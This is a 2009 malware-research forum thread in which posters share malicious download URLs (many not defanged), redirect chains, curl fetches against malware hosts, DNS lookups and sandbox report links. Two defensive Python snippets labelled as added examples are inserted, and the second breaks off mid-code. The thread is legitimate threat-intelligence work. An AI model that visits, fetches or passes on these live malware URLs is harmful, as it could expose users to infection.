Malware Domain List

Malware Related => Malicious Domains => Topic started by: Mr Clean on March 28, 2009, 03:38:47 pm

Title: Mr Clean's dirt
Post by: Mr Clean on March 28, 2009, 03:38:47 pm
Code: [Select]
http://download.av-best.info/install.php?campaign=mmb_3593020743&country=en&counter=0&campaign=mmb_3593020743&landid=4
Referer: http://scanner.av-best.info/scan.php?campaign=mmb_3593020743&landid=4


Downloads a file called AntiVirusInstaller.exe

http://www.virustotal.com/analisis/7a63e24b4f5b13ea8f13c4ddeeb467f2
http://www.threatexpert.com/report.aspx?md5=8d7463acc24e8bcb5c569d0ad2a23dba
Title: Re: Mr Clean's dirt
Post by: Mr Clean on March 30, 2009, 12:42:29 pm
Code: [Select]
http://dwnld.promotion-offer.com/secure/d3176d39144e0a6fc93c2a7d3f0b4471/49d0bb49/srm/srm_free_setup.exe

http://www.virustotal.com/analisis/7a0fe250cb4f063ccb32089f240842f6
Title: Re: Mr Clean's dirt
Post by: Mr Clean on March 30, 2009, 07:31:18 pm
It all starts here:
Code: [Select]
GET: http://pnfzetnax.nethttp://pnfzetnax.net/est/ HTTP/1.1"

Referrer: http://media2.mediafileshost.com/images/5516_562850_7444899_250_300.swf?clickTAG=http%3A//12.47.196.61/ct.jsp%3Fp%3D112801%26appid%3D32255%2"


SRC: GET /est/ HTTP/1.1
SRC: Accept: */*
SRC: Accept-Language: en-us
SRC: UA-CPU: x86
SRC: Accept-Encoding: gzip, deflate
SRC: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)
SRC: Host: pnfzetnax.net
SRC: Connection: Keep-Alive
SRC:
SRC:
DST: HTTP/1.1 302 Found
DST: Server: nginx/0.6.32
DST: Date: Mon, 30 Mar 2009 19:13:38 GMT
DST: Content-Type: text/html
DST: Transfer-Encoding: chunked
DST: Connection: close
DST: Set-Cookie: SL_25_0000=_1_; domain=webstatsmaster.com; path=/; expires=Tue, 31-Mar-2009 19:13:18 GMT
DST: Location: http://67.215.246.138/aff56.php

to download this nice pdf:

Code: [Select]
http://67.215.246.138/a9/pdf.php?u=i_7_0

http://www.virustotal.com/analisis/9e90711ccbb0a0d013a02094d5773fca
http://wepawet.iseclab.org/view.php?hash=7bff4ce3676fc2e12093b0791c1d0c9e&t=1238220458&type=js

immediately followed by this goodie:

Code: [Select]
http://67.215.246.138/a9/aff_9.exe?u=i_7_0&spl=p1

http://www.virustotal.com/analisis/030c906429c51e38b75bda1f15eee8f8
http://www.threatexpert.com/report.aspx?md5=264c543ac609726837815a398f1ea8df

Title: Re: Mr Clean's dirt
Post by: Mr Clean on March 30, 2009, 11:18:24 pm
Code: [Select]
http://www.pornoget.info/sexnew22ii/browser-video-object2.exe

http://www.virustotal.com/analisis/ce4512e7c219df07a0bb85f42547ec67
http://www.threatexpert.com/report.aspx?md5=16b7227d021f7f7073b50ae8769ea7f1
http://anubis.iseclab.org/?action=result&task_id=17734c4d20134fd0405ac17ef81bbfdee&format=html
Title: Re: Mr Clean's dirt
Post by: MysteryFCM on March 31, 2009, 12:11:37 am
Nice one, cheers :)
Title: Re: Mr Clean's dirt
Post by: Mr Clean on March 31, 2009, 01:12:03 pm
Nice one, cheers :)

thanks. 

I like what you guys/gals have going here.   

More dirt, without a doubt, is on its way.
Title: Re: Mr Clean's dirt
Post by: Mr Clean on March 31, 2009, 03:09:45 pm
This domain isn't unknown but here's more evidence of its bad behaviour

Code: [Select]
http://i1match361.biz/file/2440/f8ae8aedaf494548b681dedb37dd3d5f/0.exe.bak

http://www.virustotal.com/analisis/ddbc6d82836afea549062340220fed9c
Title: Re: Mr Clean's dirt
Post by: Mr Clean on March 31, 2009, 03:45:33 pm
Code: [Select]
http://loyaldown99.com/codec/259.exe

http://www.virustotal.com/analisis/81af29e6474cebea18f2d20bb94ba75d
Title: Re: Mr Clean's dirt
Post by: Mr Clean on March 31, 2009, 03:50:33 pm
Code: [Select]
http://ultracleaner.biz/download.php?affid=02935

downloads install.exe

http://www.virustotal.com/analisis/de2069149077bdac0ddb6ebb497d4e64
http://www.threatexpert.com/report.aspx?md5=319d046a673a0f50652b9e2884233dd6

BTW, there is an important lesson here, NEVER EVER trust DNS PTR records.  PTR record says it's google.com

Code: [Select]
$ dig ultracleaner.biz +short
84.16.227.222
$ dig -x 84.16.227.222 +short
84-16-227-222.google.com.
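
The PTR lesson in the post above, as an added example that is not part of the original thread: a forward-confirmed reverse DNS check that accepts a PTR name only when that name resolves back to the same address. The PTR answer for 84.16.227.222 is the one shown in the post; every forward answer and the `example.net`/`example.org` hosts are constructed for the demonstration, and the function names are this example's own.

```python
"""Forward-confirmed reverse DNS (FCrDNS) check."""
import ipaddress
import socket


def system_reverse(ip):
    """PTR lookup through the system resolver; returns a list of names."""
    try:
        name, aliases, _ = socket.gethostbyaddr(ip)
    except OSError:  # socket.herror / socket.gaierror: no PTR or lookup failure
        return []
    return [name, *aliases]


def system_forward(name):
    """A/AAAA lookup through the system resolver; returns address strings."""
    try:
        infos = socket.getaddrinfo(name, None)
    except OSError:
        return []
    return sorted({info[4][0] for info in infos})


def check_ptr(ip, reverse=system_reverse, forward=system_forward):
    """Return one verdict per PTR name: the name, its forward answers, and
    whether any forward answer equals the address we started from."""
    target = ipaddress.ip_address(ip)
    verdicts = []
    for raw in reverse(ip):
        name = raw.rstrip(".").lower()
        answers = forward(name)
        confirmed = False
        for text in answers:
            try:
                if ipaddress.ip_address(text) == target:
                    confirmed = True
            except ValueError:
                continue  # ignore anything that is not an address
        verdicts.append({"ptr": name, "forward": answers, "confirmed": confirmed})
    return verdicts


def trusted_name(ip, reverse=system_reverse, forward=system_forward):
    """First forward-confirmed PTR name for ip, or None if there is none."""
    for verdict in check_ptr(ip, reverse, forward):
        if verdict["confirmed"]:
            return verdict["ptr"]
    return None


# Constructed resolver data so the example runs offline.
# Whoever controls the reverse zone for an address block can publish any PTR
# name they like; only the owner of the named zone controls the forward record.
DEMO_PTR = {
    "84.16.227.222": ["84-16-227-222.google.com."],  # PTR answer from the post
    "203.0.113.5": ["www.example.org."],             # constructed: borrowed name
    "192.0.2.10": ["mail.example.net."],             # constructed: honest PTR
}
DEMO_A = {
    # assumption: the claimed google.com name has no forward record at all
    "www.example.org": ["198.51.100.7"],  # real host lives on another address
    "mail.example.net": ["192.0.2.10"],   # forward and reverse agree
}


def demo_reverse(ip):
    return DEMO_PTR.get(ip, [])


def demo_forward(name):
    return DEMO_A.get(name, [])


if __name__ == "__main__":
    for addr in DEMO_PTR:
        print(addr, check_ptr(addr, demo_reverse, demo_forward))
```

Calling `trusted_name(ip)` without the demo arguments uses the system resolver instead of the constructed tables.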
Title: Re: Mr Clean's dirt
Post by: SysAdMini on March 31, 2009, 09:07:33 pm
Code: [Select]
http://ultracleaner.biz/download.php?affid=02935

http://www.malwaredomainlist.com/mdl.php?search=84.16.227.222&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on March 31, 2009, 09:10:41 pm
Code: [Select]
http://kol-development.com/viewtubesoftware.40019.exe

http://www.virustotal.com/analisis/b43af6ab6de8c91f32f3b8c16a90aedf
http://anubis.iseclab.org/?action=result&task_id=1125842cb5bf63b246558583f1fddf282
http://www.threatexpert.com/report.aspx?md5=8ab1ad490a65ea907848b8f5b2aa6682
Title: Re: Mr Clean's dirt
Post by: Mr Clean on March 31, 2009, 09:16:51 pm
Code: [Select]
http://ultracleaner.biz/download.php?affid=02935

http://www.malwaredomainlist.com/mdl.php?search=84.16.227.222&colsearch=All&quantity=50


very nice!   8) 

Title: Re: Mr Clean's dirt
Post by: Mr Clean on March 31, 2009, 10:06:02 pm
Code: [Select]
http://files.ms-load-av.com/exe/setup_200002.exe

http://www.virustotal.com/analisis/31bb622ca5445fec193f60b305e58c5a
http://anubis.iseclab.org/?action=result&task_id=10b1ad77a3cbfc184b9054b5775669955
Title: Re: Mr Clean's dirt
Post by: SysAdMini on March 31, 2009, 10:44:09 pm
Code: [Select]
http://kol-development.com/viewtubesoftware.40019.exe

Code: [Select]
frg-softwares.com/viewtubesoftware.40019.exe
Title: Re: Mr Clean's dirt
Post by: Mr Clean on March 31, 2009, 11:17:52 pm
Code: [Select]
http://kol-development.com/viewtubesoftware.40019.exe

Code: [Select]
frg-softwares.com/viewtubesoftware.40019.exe

Title: Re: Mr Clean's dirt
Post by: SysAdMini on April 01, 2009, 06:20:18 am
Code: [Select]
somefilesportalnow.com/viewtubesoftware.40019.exe
freeportalsoftwarenow.com/viewtubesoftware.40019.exe
sim-softportal.com/viewtubesoftware.40019.exe
dnk-softwares.com/viewtubesoftware.40019.exe
get-softwares.com/viewtubesoftware.40019.exe
glk-softportal.com/viewtubesoftware.40019.exe
glock-softwares.com/viewtubesoftware.40019.exe
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 01, 2009, 11:21:55 am
Code: [Select]
contr-softportal.com/viewtubesoftware.40019.exe
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 01, 2009, 06:28:54 pm
Code: [Select]
http://zaq-softwares.com/viewtubesoftware.40016.exe
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 02, 2009, 12:51:49 am
Code: [Select]
http://files.load-pro-as.com/normal/setup_11038_3_1.exe

http://www.virustotal.com/analisis/d18a9838ad447ca5cdfb2ad761929f6d
http://anubis.iseclab.org/?action=result&task_id=164f1f17545de8e640522289457507627
http://www.threatexpert.com/report.aspx?md5=701353926e8d4c3f0d10843c297680fe

http://www.malwaredomainlist.com/mdl.php?search=78.26.179.232&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 02, 2009, 09:45:56 am
Code: [Select]
hxxp://85.17.238.145/1701/1.php

http://www.virustotal.com/analisis/f0162b1c2188c1335ab6bc2adc94cf68
http://anubis.iseclab.org/?action=result&task_id=193ed14a441ac2ad4d19ed742e2386e5e
http://www.threatexpert.com/report.aspx?md5=62f8dcb15321c33fa999cd087bbef1cf
Title: Re: Mr Clean's dirt
Post by: SysAdMini on April 02, 2009, 10:40:25 am
Code: [Select]
http://files.load-pro-as.com/normal/setup_11038_3_1.exe

http://www.virustotal.com/analisis/d18a9838ad447ca5cdfb2ad761929f6d
http://anubis.iseclab.org/?action=result&task_id=164f1f17545de8e640522289457507627
http://www.threatexpert.com/report.aspx?md5=701353926e8d4c3f0d10843c297680fe

Files have already been modified.

http://www.virustotal.com/analisis/44af4959e7409ddc649e63731075ccfd 2/38
http://www.threatexpert.com/report.aspx?md5=2f9a0708edd929fd76019b86fa45f702
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 02, 2009, 04:05:08 pm
Code: [Select]
hxxp://sendspace-usa.net/sur4you.exe

http://www.virustotal.com/analisis/66933d74a2ca3ffca1742cbcd5c1c08c
http://www.threatexpert.com/report.aspx?md5=295e55e662d21f42596972924a74db37
Title: Re: Mr Clean's dirt
Post by: SysAdMini on April 02, 2009, 05:58:40 pm
Code: [Select]
hxxp://sendspace-usa.net/sur4you.exe

http://www.virustotal.com/analisis/66933d74a2ca3ffca1742cbcd5c1c08c
http://www.threatexpert.com/report.aspx?md5=295e55e662d21f42596972924a74db37


Doesn't resolve here. Can you give me the IP? I'm experiencing DNS problems at the moment when I try to resolve .net domains.
Title: Re: Mr Clean's dirt
Post by: MysteryFCM on April 02, 2009, 06:12:09 pm
IP was 196.2.198.241 - it's not resolving atm

/edit

Others on the same IP;


Though Domain Tools says there's 65 on there (and the guy that owns sendspace-usa.net apparently owns 63 domains - and I'm betting they're likely on the same IP)

/edit

http://hosts-file.net/misc/hpObserver_-_egns.vg.html

There's also 196.2.198.240, 196.2.198.242, 196.2.198.243 and 196.2.198.252

http://hosts-file.net/?s=196.2.198.242

Related to;

http://www.bobbear.co.uk/delivery-solutions-inc.html
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 02, 2009, 10:13:59 pm
Code: [Select]
hxxp://yourguardpro.cn/installer_90001.exe
http://www.virustotal.com/analisis/0ca99080d7252f55aac81c78f032ee5f
http://www.threatexpert.com/report.aspx?md5=23cb553ce604959f3d39575813d8d48b

http://www.malwaredomainlist.com/mdl.php?search=94.247.2.215&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 03, 2009, 09:56:21 pm
Code: [Select]
hxxp://ads.belointeractive.com/RealMedia/ads/Creatives/OasDefault/NtlRhapsodyYourDirectMedia001A/NtlRhapsodyYourDirectMedia001A728_031309.sw

redirects to

hxxp://67.215.246.138/aff78.php

resulting in Javascript exploit
http://wepawet.iseclab.org/view.php?hash=90716496443a946525b818ba6cb543b4&t=1238794860&type=js

PDF exploit
http://wepawet.iseclab.org/view.php?hash=165d794ac5138a1b586290f99172a98d&type=js

binary download1
http://www.virustotal.com/analisis/673490b4fcaa59507417b1d2a7d98d72
http://www.threatexpert.com/report.aspx?md5=5bd1e08e230abe020b10f220f8448e61

binary download2
http://www.virustotal.com/analisis/d14457c38b639542a68b256b4abad3da
http://www.threatexpert.com/report.aspx?md5=4c5acab9968bca8e88fb9e193d598a7a

you know, train-wreck.
Title: Re: Mr Clean's dirt
Post by: sowhat-x on April 04, 2009, 04:50:21 am
Code: [Select]
hxxp://find-365.com/pages/make-pictures
hxxp://best-tube-home.com/200073/scan/
hxxp://files.ms-loads-av.com/exe/setup_200073_1_1.exe
hxxp://files.ms-loads-av.com/ -> spawns exe...
hxxp://files.ms-loads-av.com/exe/setup_200073_2_1.exe
hxxp://files.ms-loads-av.com/exe/setup_1_2_1.exe

find-365.com is the most interesting (to me at least), as it's hosted on more than one IP address...
http://www.bfk.de/bfk_dnslogger.html?query=find-365.com#result

Code: [Select]
hxxp://mycigarworld.info/in.cgi?16
hxxp://greatvirusscan.com/index.php?affid=10700
hxxp://greatvirusscan.com/download.php?affid=10700  -> spawns exe...

Code: [Select]
hxxp://tds.ibestadult.info/in?4
hxxp://mega-antiviral-ms.com/200073/scan/
hxxp://files.ms-loads-av.com/exe/setup_200073_1_1.exe

Code: [Select]
hxxp://webprotectionscan.com/download.php?affid=00000
hxxp://zoosexvideo.net/movie352.exe
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 04, 2009, 11:43:40 am
find-365.com is the most interesting (to me at least), as it's hosted on more than one IP address...
http://www.bfk.de/bfk_dnslogger.html?query=find-365.com#result

I agree, quite interesting.

61.235.117.88   #       SHENZHEN        CHINA
72.167.121.94   #       LOS ANGELES     UNITED STATES
88.214.200.60   #       -       UNITED KINGDOM
92.62.101.47    #       TALLINN ESTONIA

2 of these IPs have already been reported

http://www.malwaredomainlist.com/mdl.php?search=72.167.121.94&colsearch=All&quantity=50
http://www.malwaredomainlist.com/mdl.php?search=88.214.200.60&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: sowhat-x on April 04, 2009, 05:43:09 pm
Quote
hxxp://ourbestsearch.info/in.cgi?4
hxxp://adult-tube-downloads.net/promo3/?aid=330
hxxp://adult-tube-downloads.net/promo3/get.php?aid=330&vname=protect
http://www.virustotal.com/analisis/5a58f3c0fc68a1a71ced42ac568936e8
Title: Re: Mr Clean's dirt
Post by: sowhat-x on April 06, 2009, 05:37:12 am
Quote
hxxp://bestguideinc.net/search.php?qq=    ---> the .js redirector...
hxxp://www.spywareisolator2008.com/landing/?wmid=mirex    ---> spawns fake av exe...

Quote
hxxp://antivirus-av-ms-checker.com/200073/scan/
hxxp://files.download-av-ms.com/exe/setup_200073_1_1.exe
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 06, 2009, 02:39:55 pm
Code: [Select]
http://chezswing.com/jr/prop5.jpg

when is a jpg not a jpeg?
$ file prop5.jpg
prop5.jpg: PE executable for MS Windows (GUI) Intel 80386 32-bit

http://www.virustotal.com/analisis/58ba1e765843fc145cfcd922852f44ba
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 06, 2009, 04:33:15 pm
Code: [Select]
hxxp://buidnote.com/nates/?h=9ag0?892bd46e0100f07002da639a9a060000000002c15031930001040900000000170

FYI Referrer was : http://ads.svx.adbrite.com/adserver/display_iab_ads.php?

http://www.virustotal.com/analisis/a3e53d33dd932f6a03fa227527201ffd
http://anubis.iseclab.org/?action=result&task_id=1d6b8b07b6f467394215282c531f2e5d6
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 06, 2009, 06:12:13 pm
Code: [Select]
hxxp://79.117.131.32/pid=12100/type=videxp/setup.exe

Referrer = http://easter-egg-design-funny.diwyze.net/


http://www.virustotal.com/analisis/4f2e05693c24f10f714faba2295f9f4b
http://anubis.iseclab.org/?action=result&task_id=1aef76ba4318b1dd455f0eddf12bbf514


It looks like easter-egg-design-funny.diwyze.net lives in one of *those* neighbourhoods, look what lives just 2 doors down
http://www.malwaredomainlist.com/mdl.php?search=206.51.236&colsearch=All&quantity=50

Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 06, 2009, 07:06:50 pm
Code: [Select]
hxxp://www.sftcp.cn/qy.exe
same file different name
hxxp://www.sftcp.cn/tt.exe

http://www.virustotal.com/analisis/3ecb2e67a01872eef56442a3a01e7ea0
http://www.threatexpert.com/report.aspx?md5=966240056a38ac41c9f923ff251600a1


Code: [Select]
$ dig www.sftcp.cn +short
qqaa.9966.org.                 <--  gee that looks familiar
121.14.154.4
Title: Re: Mr Clean's dirt
Post by: SysAdMini on April 06, 2009, 07:15:32 pm
Code: [Select]
hxxp://79.117.131.32/pid=12100/type=videxp/setup.exe

Referrer = http://easter-egg-design-funny.diwyze.net/


There are more easter eggs.

When I look at

Code: [Select]
easter-egg-design-funny.diwyze.net/scripts.js
there is an obfuscated iframe to

Code: [Select]
zodune.info/search.php?q=easter+egg+design+funny
redirects to

Code: [Select]
inetsecuritycenter.com/index.php?c=0&e=0&affid=08064
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 06, 2009, 07:24:31 pm
Code: [Select]
hxxp://79.117.131.32/pid=12100/type=videxp/setup.exe

Referrer = http://easter-egg-design-funny.diwyze.net/


There are more easter eggs.

When I look at

Code: [Select]
easter-egg-design-funny.diwyze.net/scripts.js
there is an obfuscated iframe to

Code: [Select]
zodune.info/search.php?q=easter+egg+design+funny
redirects to

Code: [Select]
inetsecuritycenter.com/index.php?c=0&e=0&affid=08064


Code: [Select]
$ dig inetsecuritycenter.com +short
209.44.126.14    <---   has been on my naughty list for quite some time now

http://www.malwaredomainlist.com/mdl.php?search=209.44.126&colsearch=All&quantity=50

Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 06, 2009, 07:39:26 pm
Code: [Select]
hxxp://79.117.131.32/pid=12100/type=videxp/setup.exe

Referrer = http://easter-egg-design-funny.diwyze.net/


There are more easter eggs.

When I look at

Code: [Select]
easter-egg-design-funny.diwyze.net/scripts.js
there is an obfuscated iframe to

Code: [Select]
zodune.info/search.php?q=easter+egg+design+funny
redirects to

Code: [Select]
inetsecuritycenter.com/index.php?c=0&e=0&affid=08064


Code: [Select]
$ dig inetsecuritycenter.com +short
209.44.126.14    <---   has been on my naughty list for quite some time now

http://www.malwaredomainlist.com/mdl.php?search=209.44.126&colsearch=All&quantity=50

Oh goodie, PDFs too!!!!
Code: [Select]
http://79.117.131.32/pid=12100/type=videxp/spl/pdf.pdf

I can't download it now but the intent is implied.

ok, let's throw some dirt over top of this one and call it dead

Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 06, 2009, 08:45:45 pm
Code: [Select]
http://www.yutergfrg.cn/1.exe
http://www.virustotal.com/analisis/d61c4992c075cf3f164907a3f08b8aa4

Code: [Select]
http://www.asdfgsdfgsdf.cn/0330.exe
http://www.virustotal.com/analisis/0b26015cbfd6f1b00299cd5dedeefd38

Code: [Select]
http://www.arhjfgjdrf.cn/new.txt

contains:
open=y

Code: [Select]
$ dig www.asdfgsdfgsdf.cn +short
222.186.25.35

$ dig www.yutergfrg.cn +short
222.186.25.35

$ dig www.arhjfgjdrf.cn +short
222.186.25.35

$ dig www.yutergfrg.cn +short
222.186.25.35


http://www.bfk.de/bfk_dnslogger.html?query=222.186.25.35
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 07, 2009, 06:07:11 pm
Code: [Select]
hxxp://dsafsa.daslxzcewralrocjn.cn/9.exe

$ dig dsafsa.daslxzcewralrocjn.cn +short
222.76.210.14

http://www.virustotal.com/analisis/460816a185773ade10a3bb04645f2c3f
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 07, 2009, 06:10:59 pm
Code: [Select]
http://www.999mimi.net/QvodSetup3.exe

$ dig www.999mimi.net +short
208.98.13.131

http://www.virustotal.com/analisis/df61e99e65c43ec29c2eb1d91f72642c
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 07, 2009, 06:12:56 pm
Code: [Select]
http://www.991uu.net/97fbq.exe

$ dig www.991uu.net +short
208.98.4.100

http://www.virustotal.com/analisis/df61e99e65c43ec29c2eb1d91f72642c
Title: Re: Mr Clean's dirt
Post by: sowhat-x on April 07, 2009, 06:46:51 pm
Quote
Code:

hxxp://dsafsa.daslxzcewralrocjn.cn/9.exe

$ dig dsafsa.daslxzcewralrocjn.cn +short
222.76.210.14

http://www.virustotal.com/analisis/460816a185773ade10a3bb04645f2c3f
Now the guy who came up with this one should really be something special... this sample certainly represents a unique case of ultimate stupidity.
Haven't properly analysed it as I'm not in front of a VM at the moment, I merely extracted the svchostr.exe and unpacked it... the results at VirusTotal:
http://www.virustotal.com/analisis/715b9f20ecd3b61ecfec3cd9f6c85f4e
So why the heck did he put himself to so much trouble in the first place... only god knows, lmao....  :D

Here's the Anubis report as well:
http://anubis.iseclab.org/?action=result&task_id=12c7b74b4f8f197e4618d48d794c1802a&format=html
Quote
9.buzhidaoganshenmeyong.cn/bGetIp.aspx  -> GET
9.buzhidaoganshenmeyong.cn/BaiduClickerClient.asmx  -> POST
Title: Re: Mr Clean's dirt
Post by: SysAdMini on April 07, 2009, 07:22:33 pm
http://anubis.iseclab.org/?action=result&task_id=12c7b74b4f8f197e4618d48d794c1802a&format=html
Quote
9.buzhidaoganshenmeyong.cn/bGetIp.aspx  -> GET
9.buzhidaoganshenmeyong.cn/BaiduClickerClient.asmx  -> POST

Look at

Code: [Select]
9.buzhidaoganshenmeyong.cn/BaiduClickerClient.asmx
it gives you some functions.
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 07, 2009, 10:46:05 pm
Code: [Select]

this one downloads the goodie
http://fullandtotalsecurity.com/download.php?affid=08043

$ dig fullandtotalsecurity.com +short
209.44.126.14


lots of familiar family members
http://www.bfk.de/bfk_dnslogger.html?query=209.44.126.14

http://www.virustotal.com/analisis/b4ac2c66ddafca750b6adb7b0f4df84b
http://anubis.iseclab.org/?action=result&task_id=1173a2eece2951344a55bceade7e243a5

Code: [Select]
http://fullandtotalsecurity.com/install/ws.zip

$ unzip ws.zip
Archive:  ws.zip
  inflating: av.exe                 
  inflating: av.glu               
http://anubis.iseclab.org/?action=result&task_id=1f28d0fb468064264e118044b82e88cd4

http://www.virustotal.com/analisis/34ced6dce2a472fb933b738f735be320
http://www.virustotal.com/analisis/51a3c3ca22b080655c2332e8e06e5636


Title: Re: Mr Clean's dirt
Post by: MysteryFCM on April 07, 2009, 11:14:37 pm
lots of familiar family members
http://www.bfk.de/bfk_dnslogger.html?query=209.44.126.14

BFK must be out of date - most of those seem to be failing to resolve atm;

http://hosts-file.net/misc/hpObserver_-_209.44.126.14.html
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 07, 2009, 11:20:25 pm
lots of familiar family members
http://www.bfk.de/bfk_dnslogger.html?query=209.44.126.14

BFK must be out of date - most of those seem to be failing to resolve atm;

http://hosts-file.net/misc/hpObserver_-_209.44.126.14.html

[arnold voice]
they'll be back
[/arnold voice]
Title: Re: Mr Clean's dirt
Post by: MysteryFCM on April 07, 2009, 11:28:02 pm
hehe no doubt ;)
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 07, 2009, 11:54:49 pm
Code: [Select]
http://w1.iioo4567.com/01/e1.exe

$ dig w1.iioo4567.com +short
121.12.169.219

hmmmmmm...   siblings?
http://www.bfk.de/bfk_dnslogger.html?query=121.12.169.219

yup!
http://www.malwaredomainlist.com/mdl.php?search=121.12.169&colsearch=All&quantity=50

http://www.virustotal.com/analisis/90d37a91afd8a026b22de631f92fcbbd 23/40
http://anubis.iseclab.org/?action=result&task_id=1a89a3bb88444d3d4b5243a8d2f37bd8e
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 08, 2009, 05:40:54 pm
Code: [Select]
http://sendspace-us.com/surprise.exe

$ dig sendspace-us.com +short
196.2.198.241

http://virscan.org/report/65f54287fe50f4dec91a8e88986caa44.html   6/37
http://anubis.iseclab.org/?action=result&task_id=19856b42401d5af445d48e65c3a14f597

http://www.malwaredomainlist.com/mdl.php?search=196.2.198.241&colsearch=All&quantity=50

http://wepawet.iseclab.org/view.php?hash=8b4f9374e903acb4919b2e79babed892&t=1239213842&type=js


From above iseclab.org link
Code: [Select]
http://sendsurprise.com/load.php

$ dig sendsurprise.com +short
196.2.198.241

http://www.bfk.de/bfk_dnslogger.html?query=196.2.198.241#result
http://www.malwaredomainlist.com/mdl.php?search=196.2.198.241&colsearch=All&quantity=50



Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 09, 2009, 10:24:54 pm
Code: [Select]
http://xz1.177bt.com/qvod.exe

http://www.virustotal.com/analisis/9541efbef70b238de0cb7f511b96f62c 28/39
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 09, 2009, 10:36:51 pm
Code: [Select]
$ curl http://g.uye123.com/01/fz.txt

gee lemme guess

http://www.virustotal.com/analisis/1ac067475424076ea1a0255875469c18 29/40

yada yada yada

Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 09, 2009, 10:53:32 pm
Code: [Select]
http://securedantivirusonlinescanner.com/download/Install_2003-2.exe

$ dig securedantivirusonlinescanner.com +short
89.149.235.192

http://virscan.org/report/cd19a65865d37045e846c498107a3a82.html  4/37
http://www.virustotal.com/analisis/bad07c253de49cc66c5ac1d133054e18 4/40

http://anubis.iseclab.org/?action=result&task_id=1404bfc3a7ac5a5842199e7094bcf1353

makes a call to
Code: [Select]
http://securedliveuploads.com/?act=fb&1=0&2=1192706791&3=kfddnffaffihlcoemdkedcaefcfaffedhfmdmbpc&4=eebajfjafekaifnbddghoclg&5=20&6=4&7=31&8=95&9=0&10=11-18

$ dig securedliveuploads.com +short
89.149.235.192
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 11, 2009, 11:39:39 am
Code: [Select]
$ curl hxxp://www.dfhjmfgergfds.cn/new.txt
[file]
open=y
count=35



Code: [Select]
$ dig www.dfhjmfgergfds.cn +short
222.186.25.35

$ dig www.cvbnmdgesc.cn +short
222.186.25.35

MysteryFCM: Fixed CODE tags.
Title: Re: Mr Clean's dirt
Post by: SysAdMini on April 11, 2009, 11:46:02 am
Code: [Select]
url1= hxxp://www.cvbnmdgesc.cn/1.exe
..
Already added in the morning.  ;)
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 13, 2009, 11:27:06 am
Code: [Select]
hxxp://www.transport.net.cn/inc/main.js

$ dig www.transport.net.cn +short
202.104.113.55

http://wepawet.iseclab.org/view.php?hash=b2a8e4aa9bf27f7c61186c5d0fcdde87&t=1239621770&type=js


Code: [Select]
hxxp://w1.163.com7w.com/01/o.exe

$ dig w1.163.com7w.com +short
121.12.116.66

http://www.virustotal.com/analisis/f11deda1257b416b16a03ff280d51f6f 21/40

close relatives on 121.12.116.0/24 network
http://www.malwaredomainlist.com/mdl.php?search=121.12.116&colsearch=All&quantity=50

Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 13, 2009, 11:34:12 am
Code: [Select]
hxxp://www.lw7s.cn/image/qq.exe

$ dig www.lw7s.cn +short
98.126.8.2

http://www.virustotal.com/analisis/388b66140f0cc3bc7e391aa3de1d3210  35/40

Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 13, 2009, 11:37:09 am
Code: [Select]
http://dl.21dnf.cn/dnfly.exe

$ dig dl.21dnf.cn +short
121.12.105.163

http://www.virustotal.com/analisis/bedea6047cd98051978c6bbe777f1155 35/39
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 13, 2009, 11:40:32 am
Code: [Select]
hxxp://m1.bzbattery.cn/up/up.htm

$ dig m1.bzbattery.cn +short
98.126.8.2                     <-- same as www.lw7s.cn


http://www.virustotal.com/analisis/01e0d5f1ec0d2b0d44b8d1da313c13f8  9/39
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 13, 2009, 08:04:10 pm
Code: [Select]
hxxp://221.192.8.90/icons/wrm.png
$ file wrm.png
wrm.png: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

hxxp://221.192.8.90/icons/phr.png
$ file phr.png
phr.png: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

hxxp://221.192.8.90/icons/kl.png
$ file kl.png
kl.png: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

http://www.virustotal.com/analisis/2203fd0129c76dfc3ab71af8af37c9e4  7/35

http://www.virustotal.com/analisis/2296b2f50f40d42d9f82fd2bf6aa1459 25/40

http://www.virustotal.com/analisis/efb65e1a9e433e85b01d5e8f16b93df7 25/39
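
What `file` is reporting for the `.png` files above and for the earlier `prop5.jpg`, as an added example that is not part of the original thread: a content check that ignores the extension, walks the MZ header to the PE signature and COFF machine field, and flags downloads whose name claims an image. The file names come from the posts; the byte strings are constructed minimal headers, not the actual samples, and the function names are this example's own.

```python
"""Flag downloads whose extension claims an image but whose bytes are a PE file."""
import os
import struct

# Leading magic bytes for the image types the extensions claim.
SIGNATURES = [
    ("jpeg", b"\xff\xd8\xff"),
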